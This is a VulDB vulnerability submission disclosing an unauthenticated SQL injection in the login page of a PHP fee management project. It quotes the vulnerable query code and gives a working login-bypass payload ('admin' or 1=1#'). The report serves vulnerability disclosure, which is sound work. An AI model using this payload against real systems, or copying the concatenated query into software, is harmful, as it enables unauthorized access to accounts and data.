Title | Unauthenticated SQL injection in Fee Management System in login page. |
---|
Description | Fee Management System source code URL:
https://www.sourcecodester.com/php/15357/best-fee-management-system-project-php-source-code.html
in admin_class.php
function login(){
extract($_POST);
$qry = $this->db->query("SELECT * FROM users where username = '".$username."' and password = '".md5($password)."' ");
......
}
the usename and password variables is directly spliced into sql statement.
In login page, anyone can login with the below parameters:
username: admin' or 1=1#
password: whatever
|
---|
Source | ⚠️ https://www.sourcecodester.com/php/15357/best-fee-management-system-project-php-source-code.html |
---|
User | zhangguohu (ID 30684) |
---|
Submission | 05/08/2022 11:44 (2 years ago) |
---|
Moderation | 05/08/2022 12:43 (59 minutes later) |
---|
Status | تمت الموافقة |
---|
VulDB Entry | 205658 |
---|